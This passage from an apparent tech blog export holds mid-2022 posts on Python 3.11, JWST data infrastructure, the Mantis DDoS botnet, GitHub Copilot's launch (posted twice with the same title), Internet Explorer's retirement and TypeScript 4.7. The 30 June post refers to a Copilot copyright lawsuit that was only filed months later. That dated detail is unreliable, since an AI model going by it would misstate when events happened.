workloads are already fast), and code with extremely dynamic type patterns that prevent specialization.\nBetter Error Messages # Performance isn\u0026rsquo;t the only story in 3.11. The error messages have received a substantial upgrade that I think will have an outsized impact on developer experience, especially for newcomers.\nPython 3.11 now shows precise error locations within expressions. Instead of pointing at an entire line, tracebacks highlight exactly which part of an expression caused the error:\nTraceback (most recent call last): File \u0026#34;example.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; result = data[\u0026#34;users\u0026#34;][0][\u0026#34;name\u0026#34;].upper() ~~~~~~~~~~~~~~~~~~~~^^^^^^ TypeError: \u0026#39;NoneType\u0026#39; object is not subscriptable That ~~~~ and ^^^^^^ precisely indicating which operation failed? That\u0026rsquo;s going to save developers countless hours of debugging. I\u0026rsquo;ve lost track of how many times I\u0026rsquo;ve stared at a long chained expression in a traceback trying to figure out which part was None. This is a genuinely user-centric improvement.\nException Groups and TaskGroups # Python 3.11 also introduces Exception Groups (PEP 654), a new mechanism for raising and handling multiple exceptions simultaneously. This is directly motivated by the async programming model — when you\u0026rsquo;re running concurrent tasks, multiple failures can occur simultaneously, and the current exception model can only represent one at a time.\nThe new except* syntax allows handling specific exception types from a group while letting others propagate:\ntry: async with asyncio.TaskGroup() as tg: tg.create_task(operation_a()) tg.create_task(operation_b()) except* ValueError as eg: handle_value_errors(eg.exceptions) except* OSError as eg: handle_os_errors(eg.exceptions) TaskGroup itself is a new asyncio primitive that replaces the somewhat clunky gather() pattern. It provides structured concurrency — all tasks in the group are properly awaited, and if one fails, the others are cancelled. This is a pattern that Trio popularized, and it\u0026rsquo;s great to see it making its way into the standard library.\nThe Broader Implications # What excites me most about the Faster CPython project isn\u0026rsquo;t the 3.11 numbers — it\u0026rsquo;s the trajectory. The team has published a roadmap targeting a 5x speedup over several releases. 3.11 is the first step, and if they maintain this pace, Python\u0026rsquo;s performance story changes fundamentally.\nThere\u0026rsquo;s also a compounding effect. As CPython gets faster, the threshold at which you\u0026rsquo;d reach for C extensions or an alternative language rises. Code that currently needs Cython for acceptable performance might run fine on pure Python in a few releases. This simplifies deployment, reduces maintenance burden, and makes the ecosystem more accessible.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and the language has never felt more vital. The combination of performance improvements, better error messages, and structured concurrency support shows a project that\u0026rsquo;s listening to its users and investing in the areas that matter.\nWill Python 3.11 make Python competitive with Go or Rust for performance-sensitive workloads? No, and it shouldn\u0026rsquo;t try to be. But a 25% average speedup means real cost savings on cloud compute, faster test suites, quicker data processing pipelines, and a better experience for developers who choose Python for its productivity advantages.\nIf you\u0026rsquo;re running Python in production, start testing against the 3.11 beta. The compatibility story looks good — the specializing interpreter is an implementation detail that shouldn\u0026rsquo;t affect correctly-written code. October\u0026rsquo;s release is going to be worth the upgrade.\n","date":"21 July 2022","externalUrl":null,"permalink":"/posts/220721-python-311-performance-leap/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.11 is in beta with impressive performance improvements. The Faster CPython project is delivering real results, with benchmarks showing 10-60% speedups.","title":"Python 3.11 Beta — The Fastest CPython Release Yet","type":"posts"},{"content":"On July 12th, NASA released the first full-color images from the James Webb Space Telescope, and they are nothing short of stunning. The deep field image of galaxy cluster SMACS 0723 shows thousands of galaxies in a patch of sky the size of a grain of sand held at arm\u0026rsquo;s length. It\u0026rsquo;s easy to get lost in the wonder — and you should — but as an engineer, I can\u0026rsquo;t help looking at the data pipeline that makes this possible and marveling at that too.\nFrom L2 to Your Screen # JWST sits at the second Lagrange point, roughly 1.5 million kilometers from Earth. That distance creates fascinating constraints. Unlike Hubble in low Earth orbit, you can\u0026rsquo;t send a repair mission if something goes wrong. And every byte of data has to travel that distance via radio link.\nThe telescope communicates with Earth through the Deep Space Network (DSN) using a Ka-band high-gain antenna, achieving data rates of up to 28 Mbps. That might sound like a terrible home internet connection, but it\u0026rsquo;s remarkable for a satellite 1.5 million km away. JWST generates roughly 57 GB of science data per day — a manageable volume, but one that needs to be transmitted in scheduled contact windows of about 4 hours, twice daily.\nThe raw data hits the ground at DSN stations in Goldstone (California), Madrid, and Canberra, forming a global network that ensures coverage regardless of Earth\u0026rsquo;s rotation. From there, it\u0026rsquo;s transmitted to the Space Telescope Science Institute (STScI) in Baltimore, which operates the Mikulski Archive for Space Telescopes (MAST).\nThe Calibration Pipeline # What most people see as \u0026ldquo;JWST takes a picture\u0026rdquo; is actually a multi-stage data processing pipeline that would make any DevOps engineer nod in appreciation. The raw detector readouts go through a series of calibration steps that are conceptually similar to a CI/CD pipeline:\nStage 1 — Detector-level corrections: Bias subtraction, dark current removal, linearity correction, saturation flagging. This is essentially noise removal and sensor normalization — each of JWST\u0026rsquo;s detectors has unique characteristics that need to be accounted for.\nStage 2 — Calibrated exposures: Flat fielding, flux calibration, WCS (World Coordinate System) assignment. This transforms raw sensor data into scientifically meaningful measurements with proper coordinates.\nStage 3 — Combined products: Multiple exposures are aligned, cosmic rays are rejected, and final mosaics are produced. This is where the deep field images we see actually come together.\nThe entire pipeline is written in Python — specifically the jwst package available on GitHub. It runs on a mix of on-premises infrastructure at STScI and AWS cloud resources. The choice to use Python reflects both the astronomy community\u0026rsquo;s deep investment in the language and the maturity of the scientific Python ecosystem (NumPy, SciPy, Astropy).\nScaling for Science # Here\u0026rsquo;s where it gets interesting from an infrastructure perspective. JWST is expected to operate for at least 10 years (it launched with enough fuel for potentially 20). Over that period, the archive will accumulate petabytes of data. But the raw volume isn\u0026rsquo;t the hard part — it\u0026rsquo;s the reprocessing.\nAs calibration models improve and new understanding of the instruments develops, the entire archive needs to be reprocessed. This is a pattern familiar to anyone working with data pipelines at scale: your processing isn\u0026rsquo;t done once; it\u0026rsquo;s an iterative cycle where improvements to the pipeline mean reprocessing everything. STScI has embraced cloud computing precisely for this burst capacity — spinning up hundreds of instances to reprocess years of observations, then scaling back down.\nThe parallel with modern data engineering is striking. Replace \u0026ldquo;astronomical observations\u0026rdquo; with \u0026ldquo;event streams\u0026rdquo; and \u0026ldquo;calibration pipeline\u0026rdquo; with \u0026ldquo;ETL pipeline,\u0026rdquo; and you have the same architectural challenges: immutable raw data, reproducible processing stages, the need for reprocessing, and burst compute requirements. JWST\u0026rsquo;s data team has essentially built a world-class data lakehouse, just one pointed at the sky.\nOpen Data, Open Source # One of the most admirable aspects of the JWST program is its commitment to open science. After a 12-month exclusive access period for the proposing astronomers, all data becomes publicly available through MAST. The calibration pipeline is open source. The data formats use FITS and ASDF (Advanced Scientific Data Format), both open standards.\nThis means anyone with a laptop and Python can download JWST data and process it themselves. The democratization of space science data mirrors what we\u0026rsquo;ve seen in other fields — when you remove barriers to access, you get an explosion of analysis from unexpected directions. Some of the most interesting astronomical discoveries have come from citizen scientists and researchers outside the original observation team.\nMy Take # As engineers, we sometimes get tunnel vision on the problems in our immediate domain. JWST is a reminder that the infrastructure patterns we use daily — data pipelines, cloud burst computing, CI/CD-style processing stages, open-source tooling — are being applied to push the boundaries of human knowledge.\nThe fact that this pipeline runs on Python and AWS, using patterns that any cloud engineer would recognize, speaks to the maturity of our tools. Twenty years ago, this kind of data processing required custom Fortran code on supercomputers. Today, it\u0026rsquo;s Python packages and cloud instances.\nI\u0026rsquo;ve downloaded some of the early release data and started poking around with Astropy. If you\u0026rsquo;ve never worked with astronomical data, I recommend it — it\u0026rsquo;s a fascinating application of the same data engineering skills we use daily, just with a considerably more impressive dataset. The universe is the ultimate big data problem.\n","date":"14 July 2022","externalUrl":null,"permalink":"/posts/220714-jwst-first-images-data-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The James Webb Space Telescope released its first full-color images this week. Behind the breathtaking photos is a remarkable data pipeline worth examining.","title":"Webb's First Light — The Data Infrastructure Behind JWST's Images","type":"posts"},{"content":"Cloudflare just disclosed that they mitigated a DDoS attack peaking at 26 million HTTPS requests per second — the largest of its kind ever recorded. The attack, attributed to a botnet they\u0026rsquo;ve dubbed \u0026ldquo;Mantis,\u0026rdquo; targeted a customer using Cloudflare\u0026rsquo;s Free plan. Let that sink in: the largest HTTPS DDoS attack in history, absorbed by a free-tier service. The infrastructure behind that capability is remarkable, but the botnet itself is what keeps me up at night.\nWhy HTTPS DDoS Is Different # Most people hear \u0026ldquo;DDoS\u0026rdquo; and think of volumetric attacks — flooding a target with raw bandwidth. Those are the blunt instruments of the DDoS world, and while they can be massive (we\u0026rsquo;ve seen attacks exceeding 3 Tbps), they\u0026rsquo;re relatively straightforward to mitigate with sufficient network capacity.\nHTTPS DDoS is a fundamentally different beast. Each request requires a TLS handshake, HTTP parsing, and application-layer processing. The computational cost per request is orders of magnitude higher than a simple UDP flood. An attacker generating 26 million HTTPS requests per second isn\u0026rsquo;t just filling pipes — they\u0026rsquo;re exhausting CPU, memory, and connection tables on the target. It\u0026rsquo;s the difference between someone flooding your mailbox with empty envelopes versus sending 26 million certified letters that each require a signature.\nThis is why the Mantis numbers are so alarming. The previous record was around 15.3 million HTTPS rps, set earlier this year. We\u0026rsquo;ve seen a 70% increase in attack capability in just months.\nThe Mantis Botnet Architecture # What makes Mantis particularly interesting — and concerning — is its composition. According to Cloudflare\u0026rsquo;s analysis, the botnet operates with approximately 5,000 nodes. That\u0026rsquo;s tiny by botnet standards. Mirai at its peak controlled hundreds of thousands of IoT devices. Mantis achieves its record-breaking output through quality over quantity.\nThe nodes aren\u0026rsquo;t compromised IoT devices with limited compute. They\u0026rsquo;re virtual machines and servers running in cloud data centers, each capable of generating thousands of HTTPS requests per second. These are machines with powerful CPUs, generous memory, and high-bandwidth network connections — the same hardware we use to run production workloads.\nThis represents an evolution in DDoS strategy. Instead of infecting millions of cheap devices, attackers are compromising a smaller number of powerful machines. The economics make sense: a single compromised cloud VM can generate more malicious traffic than thousands of IoT lightbulbs, and it\u0026rsquo;s harder to distinguish from legitimate traffic because it originates from reputable IP ranges.\nCloud Providers as Unwitting Accomplices # The elephant in the room is that cloud providers are effectively hosting the attack infrastructure. These compromised VMs are running in AWS, GCP, Azure, and other platforms, using those providers\u0026rsquo; bandwidth and compute to launch attacks. The attackers get enterprise-grade infrastructure at someone else\u0026rsquo;s expense.\nThis creates an uncomfortable responsibility question. Cloud providers have the technical capability to detect and shut down anomalous outbound traffic patterns. A VM suddenly generating thousands of HTTPS requests per second to a single target is not normal behavior. But implementing automated detection and response at scale is complex, and false positives could impact legitimate customers.\nI\u0026rsquo;ve worked with enough cloud infrastructure to know that egress monitoring is often an afterthought. We obsess over ingress security — firewalls, WAFs, intrusion detection — but monitoring what leaves our networks gets far less attention. Mantis is a reminder that compromised infrastructure isn\u0026rsquo;t just a risk to the machine\u0026rsquo;s owner; it\u0026rsquo;s a risk to the entire internet.\nWhat This Means for Defense # If you\u0026rsquo;re running internet-facing services, the implications are straightforward but sobering. Traditional DDoS mitigation that relies on IP reputation and rate limiting is increasingly insufficient. Mantis traffic comes from cloud IP ranges that host millions of legitimate services. You can\u0026rsquo;t simply block AWS or GCP without cutting off real users.\nThe effective defenses are moving up the stack:\nChallenge-based mitigation: CAPTCHAs and JavaScript challenges that are trivial for browsers but expensive for bots Behavioral analysis: Distinguishing human browsing patterns from automated requests Anycast networks: Distributing traffic across global points of presence so no single location is overwhelmed Managed DDoS services: Cloudflare, Akamai, and AWS Shield exist because most organizations can\u0026rsquo;t build this in-house The cost asymmetry is the fundamental problem. Launching an HTTPS DDoS attack from compromised cloud infrastructure is cheap. Defending against it requires significant investment in global infrastructure. This is exactly why managed services make sense for all but the largest organizations.\nMy Take # I\u0026rsquo;ve been watching DDoS evolution for two decades, and Mantis represents a phase shift. We\u0026rsquo;ve moved from script kiddies with IoT botnets to sophisticated operators leveraging cloud infrastructure. The 26 million rps number will be broken — probably within the year.\nThe uncomfortable truth is that our cloud-centric architecture has created the perfect attack platform. The same elasticity and global distribution that makes cloud computing powerful for legitimate use makes it powerful for attacks. Until cloud providers take more aggressive action on outbound abuse, we\u0026rsquo;re in an arms race where defenders are always reacting.\nFor now, if you\u0026rsquo;re running production services without DDoS protection, you\u0026rsquo;re living on borrowed time. The barrier to launching devastating attacks has never been lower, and the ceiling keeps rising.\n","date":"7 July 2022","externalUrl":null,"permalink":"/posts/220707-cloudflare-mantis-record-ddos/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cloudflare mitigated the largest HTTPS DDoS attack ever recorded at 26 million requests per second. The Mantis botnet represents a new generation of volumetric threats.","title":"26 Million Requests Per Second — Cloudflare and the Mantis Botnet","type":"posts"},{"content":"GitHub Copilot officially went generally available on June 21st, and the developer world is buzzing. After more than a year in technical preview where over 1.2 million developers kicked its tires, GitHub and OpenAI have decided it\u0026rsquo;s ready for prime time — with a $10/month price tag. Having used the preview extensively over the past year, I have thoughts.\nFrom Party Trick to Production Tool # When Copilot first launched as a preview in June 2021, the reaction was split between \u0026ldquo;this is the future\u0026rdquo; and \u0026ldquo;this is a toy.\u0026rdquo; I\u0026rsquo;ll admit I was somewhere in between. The early demos were impressive — watch it autocomplete an entire function from a comment — but day-to-day usage told a more nuanced story. It was great at boilerplate, occasionally brilliant at algorithmic suggestions, and sometimes confidently wrong in ways that could slip past a tired developer.\nOver the past year, the model has improved noticeably. The suggestions are more contextually aware, the latency has decreased, and it handles more programming languages with competence. What\u0026rsquo;s interesting is how it\u0026rsquo;s changed my workflow. I don\u0026rsquo;t think of it as \u0026ldquo;AI writing my code\u0026rdquo; — it\u0026rsquo;s more like having a very fast autocomplete that occasionally reads my mind. The 40% of code reportedly written with Copilot assistance in the preview? That tracks with my experience, though \u0026ldquo;assistance\u0026rdquo; is doing heavy lifting in that statistic.\nThe $10/Month Question # The pricing decision is fascinating. GitHub could have gone freemium, could have bundled it with Enterprise plans only, or could have made it part of a higher-tier GitHub subscription. Instead, they went with a straightforward $10/month for individuals (free for students and open-source maintainers), which is about the price of a nice lunch.\nThis tells me two things. First, Microsoft is serious about making this mainstream, not a premium add-on for elite developers. Second, the compute costs must have come down enough to make this viable at scale. Running Codex inference for millions of developers in real-time isn\u0026rsquo;t cheap, and the pricing suggests they\u0026rsquo;ve achieved significant optimization — or they\u0026rsquo;re willing to subsidize adoption to build market position.\nFor teams and enterprises, I expect tiered pricing to follow. The real revenue play isn\u0026rsquo;t $10/month from individual developers; it\u0026rsquo;s becoming embedded in enterprise development workflows where switching costs become astronomical.\nThe Licensing Elephant in the Room # The most contentious issue hasn\u0026rsquo;t gone away with the GA launch. Copilot was trained on public GitHub repositories, and the question of whether its suggestions constitute derivative works of copyrighted code remains unresolved. The lawsuit filed by Matthew Butterick and others is still in its early stages, and the outcome could reshape how AI models interact with open-source licenses.\nI\u0026rsquo;ve seen Copilot suggest code that\u0026rsquo;s essentially verbatim from well-known open-source projects — complete with variable names that only make sense in the original context. GitHub has added a filter to block suggestions matching public code, but it\u0026rsquo;s an opt-in setting, not a default. That design choice says a lot about where they think the line is.\nFor enterprise adoption, this is the risk factor. Legal departments are going to have questions, and \u0026ldquo;we trained on open-source code but the output is transformative\u0026rdquo; isn\u0026rsquo;t the slam-dunk argument GitHub thinks it is. At least not yet.\nWhat This Means for Developers # Let me be direct: Copilot is not going to replace developers. I\u0026rsquo;ve been hearing \u0026ldquo;AI will replace programmers\u0026rdquo; since expert systems in the 1980s. What Copilot actually does is shift where developers spend their mental energy. Less time on boilerplate and syntax, more time on architecture, design, and the genuinely hard problems.\nThat said, I worry about the impact on learning. A junior developer who relies heavily on Copilot might miss the deep understanding that comes from struggling with a problem. There\u0026rsquo;s a difference between Copilot suggesting a binary search implementation and understanding why binary search works and when to use it. The best developers I know built their intuition through years of writing code the hard way.\nMy Take # I\u0026rsquo;m subscribing. For $10/month, the productivity boost on repetitive tasks alone justifies the cost. But I\u0026rsquo;m treating it like I treat any tool — with healthy skepticism. I review every suggestion, I understand what it\u0026rsquo;s doing before I accept it, and I don\u0026rsquo;t let it make architectural decisions for me.\nThe bigger story here isn\u0026rsquo;t Copilot itself — it\u0026rsquo;s that we\u0026rsquo;re at the beginning of a fundamental shift in how code gets written. GitHub has first-mover advantage, but Amazon (CodeWhisperer), Google, and others are close behind. The competition should drive rapid improvement and hopefully push the industry toward resolving the licensing questions.\nWe\u0026rsquo;re watching the IDE evolve in real-time, and for once, the hype might actually be proportional to the change that\u0026rsquo;s coming. Just maybe not as fast as the marketing suggests.\n","date":"30 June 2022","externalUrl":null,"permalink":"/posts/220630-github-copilot-goes-ga/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot is now generally available as a paid product. After a year of technical preview, AI-assisted coding moves from experiment to everyday tool.","title":"GitHub Copilot Goes GA — AI Pair Programming Gets Real","type":"posts"},{"content":"Two days ago, GitHub officially launched Copilot as a generally available product, moving it out of the free technical preview that\u0026rsquo;s been running since June 2021 and into a paid offering at $10 per month (or $100 per year). Free for verified students and maintainers of popular open-source projects. After a year of using the preview, I have thoughts — and they\u0026rsquo;re more nuanced than the \u0026ldquo;AI will replace developers\u0026rdquo; headlines suggest.\nWhat Copilot Actually Is (and Isn\u0026rsquo;t) # For those who haven\u0026rsquo;t used it: GitHub Copilot is a code completion tool powered by OpenAI\u0026rsquo;s Codex model, which is a descendant of GPT-3 fine-tuned on code. It integrates into your editor (VS Code primarily, with support for JetBrains IDEs, Neovim, and others) and provides inline suggestions that range from completing a single line to generating entire functions.\nIt\u0026rsquo;s not a chatbot. It\u0026rsquo;s not a code reviewer. It\u0026rsquo;s not going to architect your system. What it does is predict what you\u0026rsquo;re likely to type next, based on the context of your current file, your comments, function signatures, and surrounding code. Think of it as autocomplete on steroids — really powerful steroids, but autocomplete nonetheless.\nDuring the technical preview, I used Copilot daily across Python, TypeScript, and Go projects. My experience was consistent: it\u0026rsquo;s remarkably good at boilerplate and pattern-matching tasks, occasionally brilliant at complex logic, and sometimes confidently wrong in ways that could introduce subtle bugs if you\u0026rsquo;re not paying attention.\nWhere Copilot Shines # The best use cases I\u0026rsquo;ve found over the past year:\nTest generation. Write a function, start writing a test, and Copilot will often generate reasonable test cases covering happy paths and common edge cases. It won\u0026rsquo;t replace a thought-through testing strategy, but it can scaffold the repetitive parts of test suites incredibly quickly.\nBoilerplate reduction. Setting up Express route handlers, writing Terraform resource blocks, crafting SQL queries from comments — the kind of code where the pattern is well-established and you\u0026rsquo;re essentially translating intent into syntax. Copilot handles this at near-perfect accuracy.\nLearning new APIs. When I started working with a Go library I hadn\u0026rsquo;t used before, Copilot\u0026rsquo;s suggestions taught me idiomatic patterns faster than reading documentation. It\u0026rsquo;s not a replacement for understanding what the code does, but it\u0026rsquo;s a remarkably efficient way to see how APIs are typically used.\nDocstrings and comments. Writing documentation for functions is the kind of tedious task that Copilot handles well. It reads the function implementation and generates a description that\u0026rsquo;s usually accurate and well-formatted.\nWhere It Falls Short # The failure modes are important to understand, because they\u0026rsquo;re not always obvious:\nSubtle logic errors. Copilot might generate a sorting function that looks correct but uses an unstable sort when stability matters, or a date comparison that doesn\u0026rsquo;t account for timezones. The code compiles, the tests pass for most cases, and the bug hides until production.\nSecurity-sensitive code. I\u0026rsquo;ve seen Copilot suggest SQL queries without parameterization, crypto implementations with hardcoded IVs, and authentication logic with timing vulnerabilities. It optimizes for \u0026ldquo;code that looks right\u0026rdquo; not \u0026ldquo;code that is secure.\u0026rdquo; Never accept Copilot suggestions in security-critical paths without thorough review.\nOutdated patterns. The training data has a cutoff, and Copilot sometimes suggests deprecated APIs or patterns that were common in older codebases. If you\u0026rsquo;re working with rapidly evolving libraries, the suggestions may not reflect current best practices.\nOver-reliance risk. This is the one that concerns me most. I\u0026rsquo;ve caught myself accepting suggestions without fully reading them, especially when under time pressure. The cognitive shortcut of \u0026ldquo;Copilot suggested it, it\u0026rsquo;s probably fine\u0026rdquo; is dangerous and insidious.\nThe Pricing and Open Source Question # The $10/month pricing is reasonable for professional developers — if Copilot saves you even 30 minutes a month, it\u0026rsquo;s paid for itself. The free tier for students and open-source maintainers is a smart move that will build loyalty and keep the training pipeline flowing.\nBut the training pipeline is exactly where the controversy lies. Copilot was trained on public GitHub repositories, including those with copyleft licenses like GPL. The legal and ethical implications are far from settled. If Copilot suggests a block of code that\u0026rsquo;s substantially similar to GPL-licensed source code, and you incorporate it into a proprietary project, are you violating the license? GitHub\u0026rsquo;s position is that training on public code constitutes fair use, but this hasn\u0026rsquo;t been tested in court.\nThe Software Freedom Conservancy and others have raised serious concerns. I think these concerns are legitimate. The open-source community created the training data, and the fact that a commercial product is being built on that data without clear consent mechanisms is worth scrutinizing — even if you ultimately conclude it\u0026rsquo;s legally permissible.\nThe Bigger Picture # Copilot\u0026rsquo;s general availability is a milestone, but it\u0026rsquo;s also just the beginning. GitHub is clearly going to expand Copilot\u0026rsquo;s capabilities — I\u0026rsquo;d expect deeper IDE integration, more language support, and potentially features that go beyond code completion into code review and refactoring suggestions.\nMore broadly, Copilot is the most visible example of a trend that\u0026rsquo;s going to reshape software development: AI as a development tool. Not replacing developers, but changing the nature of the work. Less time typing boilerplate, more time thinking about architecture, reviewing AI suggestions, and solving problems that require genuine understanding.\nMy Take # After a year with Copilot, I\u0026rsquo;m cautiously positive. It makes me faster at tasks I was already good at, and it\u0026rsquo;s a useful learning aid for unfamiliar territories. But I\u0026rsquo;m under no illusion that it makes me a better engineer — if anything, it requires more discipline to maintain code quality standards when a tool is constantly offering to write the next line for you.\nAt $10/month, I\u0026rsquo;ll be subscribing. The productivity gains are real, even if modest. But I\u0026rsquo;d strongly recommend establishing team guidelines around Copilot usage: always review suggestions before accepting, never use them blindly in security-critical code, and maintain your ability to write code without AI assistance. The tool is most valuable when you\u0026rsquo;re good enough to know when it\u0026rsquo;s wrong.\nThe AI coding assistant era is officially here. It\u0026rsquo;s not the revolution the hype suggests, but it\u0026rsquo;s not a gimmick either. It\u0026rsquo;s a useful tool that requires skilled hands to wield effectively — which, come to think of it, describes most tools worth using.\n","date":"23 June 2022","externalUrl":null,"permalink":"/posts/220623-github-copilot-goes-ga/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot exits technical preview and becomes generally available at $10/month, marking the first mainstream AI coding assistant.","title":"GitHub Copilot Goes GA — AI Pair Programming Gets Real","type":"posts"},{"content":"Yesterday, June 15, 2022, Microsoft officially retired Internet Explorer. The browser that once commanded over 95% market share, that launched the browser wars, that drove web developers to drink — it\u0026rsquo;s finally, truly done. And while the memes are flying, there\u0026rsquo;s a genuine story here about how a single piece of software shaped the trajectory of the entire web.\nA Complicated Legacy # My relationship with Internet Explorer goes back to the mid-90s, when IE 3.0 shipped with CSS support and felt like a genuine leap forward. Microsoft\u0026rsquo;s decision to bundle IE with Windows was ruthless business strategy (and eventually ruled anticompetitive), but in the early days, it also meant that millions of people got access to a reasonably capable web browser for free.\nInternet Explorer 6, released in 2001, is where the story goes dark. IE6 became the browser that wouldn\u0026rsquo;t die — so dominant that Microsoft essentially stopped developing it, leaving the web stuck with its buggy CSS implementation, proprietary extensions like ActiveX, and a rendering engine that was fundamentally incompatible with emerging web standards.\nFor an entire generation of web developers, \u0026ldquo;making it work in IE\u0026rdquo; was not a feature request — it was the job. I remember spending more time writing IE-specific CSS hacks and conditional comments than writing actual application logic. The * html hack, the box model bug, the PNG transparency workaround with AlphaImageLoader — these weren\u0026rsquo;t edge cases, they were daily reality.\n\u0026lt;!--[if IE 6]\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; type=\u0026#34;text/css\u0026#34; href=\u0026#34;ie6-fixes.css\u0026#34; /\u0026gt; \u0026lt;![endif]--\u0026gt; If that syntax gives you a twinge of recognition, you\u0026rsquo;ve earned your stripes.\nThe Stagnation Era and Its Consequences # Between IE6\u0026rsquo;s release in 2001 and IE7\u0026rsquo;s arrival in 2006, web innovation essentially stalled. Microsoft had won the browser war against Netscape and had no competitive incentive to improve IE. During those five years, standards bodies pushed forward with CSS 2.1, the early work on HTML5, and ECMAScript improvements — but none of it mattered if the browser used by 90% of the world couldn\u0026rsquo;t render it.\nThis stagnation had consequences that rippled through the entire industry:\nFlash flourished partly because IE couldn\u0026rsquo;t do what developers needed. Rich interactivity, video playback, complex animations — Flash filled the gap that IE\u0026rsquo;s limited capabilities created. Web standards advocacy became a movement. The Web Standards Project (WaSP) and voices like Jeffrey Zeldman fought a long campaign to convince developers (and browser vendors) to build for standards rather than specific browsers. jQuery was born in 2006 largely to paper over the inconsistencies between IE and other browsers. The fact that we needed an abstraction layer just to do basic DOM manipulation tells you everything about the state of cross-browser development. The emergence of Firefox in 2004, followed by Chrome in 2008, finally created the competitive pressure that Microsoft needed to take browser development seriously again. IE7, 8, 9, and eventually 10 and 11 each represented genuine improvements — but IE could never shake the legacy of those lost years.\nThe Long Tail of IE Support # Even after IE\u0026rsquo;s market share plummeted, dropping it from your support matrix was never straightforward. Enterprise applications built on ActiveX controls, internal portals that relied on IE\u0026rsquo;s quirks mode, government systems with certification requirements tied to specific IE versions — these kept the browser on life support long after it was technically obsolete.\nI worked on a project as recently as 2019 where IE11 support was a hard requirement from the client. Not because their users preferred IE, but because their corporate SOE (Standard Operating Environment) hadn\u0026rsquo;t been updated, and the IT department wouldn\u0026rsquo;t approve an exception. We spent roughly 20% of our frontend development time on IE11 polyfills, transpilation, and CSS fallbacks — for a browser with less than 5% of our actual user traffic.\nThis is the hidden cost that rarely shows up in market share statistics. IE didn\u0026rsquo;t just affect the browsers it ran on; it affected the entire web by forcing developers to build for the lowest common denominator.\nWhat Actually Changes Now # In practical terms, yesterday\u0026rsquo;s retirement means that IE 11 on Windows 10 will be progressively disabled, redirecting users to Microsoft Edge (which includes an \u0026ldquo;IE mode\u0026rdquo; for legacy compatibility). For most web developers, IE has been irrelevant for years — major frameworks like React, Vue, and Angular have already dropped IE11 support, and CSS Grid and modern JavaScript features have been shipping without IE fallbacks.\nBut the symbolic importance matters. As long as IE was \u0026ldquo;officially supported,\u0026rdquo; there were organizations that used that status as justification for requiring IE compatibility. With the official retirement, that argument evaporates. If you\u0026rsquo;re still dealing with stakeholders who insist on IE support, you now have a clear answer: Microsoft itself says it\u0026rsquo;s over.\nMy Take # I\u0026rsquo;m not going to pretend I\u0026rsquo;m sad. Internet Explorer, particularly in its IE6-through-IE8 incarnation, probably cost the global web development community billions of hours of wasted effort. It held back web standards adoption by years. It created an entire cottage industry of workarounds and compatibility layers.\nBut I\u0026rsquo;ll also acknowledge that IE played a pivotal role in making the web accessible to the mass market. The browser wars, for all their damage, also drove innovation at a pace we might not have seen otherwise. And IE\u0026rsquo;s eventual decline created the multi-browser ecosystem we have today, where Chrome, Firefox, Safari, and Edge compete on standards compliance and performance.\nPour one out for Internet Explorer. Not because we\u0026rsquo;ll miss it, but because we survived it. The web is better for having moved on, and yesterday made that transition official. Now, if someone could also convince Safari to implement features on a reasonable timeline, that would be great.\n","date":"16 June 2022","externalUrl":null,"permalink":"/posts/220616-internet-explorer-retirement/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft officially retired Internet Explorer on June 15, 2022, ending a 27-year era that shaped — and sometimes hindered — web development.","title":"Internet Explorer Is Finally Dead — Reflecting on 27 Years of Web History","type":"posts"},{"content":"After what feels like years of awkward workarounds and community frustration, TypeScript 4.7 has landed with genuine ES module support for Node.js. The release, which shipped on May 24, introduces the node16 and nodenext module resolution modes, and for those of us who have been wrestling with the ESM/CJS interop nightmare, this is a significant milestone.\nThe ESM Problem, Briefly # If you\u0026rsquo;ve been living in Node.js land, you know the pain. Node.js added support for ES modules (the import/export syntax) starting with version 12, with full unflagged support in Node 16. But TypeScript\u0026rsquo;s module resolution was designed around CommonJS semantics. The result was a no-man\u0026rsquo;s-land where you could write ESM syntax in TypeScript, but the compiler would emit CommonJS require() calls, and actual ESM support required a maze of configuration that rarely worked cleanly.\nThe practical consequences were real. Library authors who wanted to ship both ESM and CJS had to maintain dual build configurations. Consumers trying to import ESM-only packages into TypeScript projects hit cryptic errors. The .mjs extension felt like a hack. And the relationship between \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json and TypeScript\u0026rsquo;s module compiler option was, to put it charitably, confusing.\nI\u0026rsquo;ve spent an embarrassing number of hours on projects debugging import issues that ultimately came down to the TypeScript compiler and Node.js having different ideas about how modules should resolve. It was the kind of problem where Stack Overflow had fifty different answers, all of which were correct for slightly different configurations, and none of which worked for yours.\nWhat TypeScript 4.7 Actually Changes # The new node16 and nodenext moduleResolution options tell TypeScript to follow Node.js\u0026rsquo;s actual module resolution algorithm, including:\nPackage.json \u0026quot;type\u0026quot; field awareness: TypeScript now respects whether a package declares itself as \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; or \u0026quot;type\u0026quot;: \u0026quot;commonjs\u0026quot;, and adjusts its resolution and emit behavior accordingly.\n.mts and .cts extensions: Just as Node.js uses .mjs and .cjs to explicitly mark individual files as ESM or CJS regardless of the package type, TypeScript introduces .mts and .cts source file extensions (emitting .mjs and .cjs respectively).\npackage.json exports and imports: TypeScript now understands the \u0026quot;exports\u0026quot; and \u0026quot;imports\u0026quot; fields in package.json, which is essential for packages that provide conditional exports for different module systems.\nMandatory file extensions in relative imports: When targeting ESM, TypeScript now requires file extensions in relative import paths (import { foo } from \u0026quot;./bar.js\u0026quot;), matching Node.js\u0026rsquo;s ESM resolution behavior. Yes, you write .js even though the source file is .ts — this was controversial, but it\u0026rsquo;s the correct behavior since TypeScript emits .js files.\nHere\u0026rsquo;s what a minimal tsconfig.json for an ESM Node.js project looks like now:\n{ \u0026#34;compilerOptions\u0026#34;: { \u0026#34;module\u0026#34;: \u0026#34;node16\u0026#34;, \u0026#34;moduleResolution\u0026#34;: \u0026#34;node16\u0026#34;, \u0026#34;target\u0026#34;: \u0026#34;es2022\u0026#34;, \u0026#34;outDir\u0026#34;: 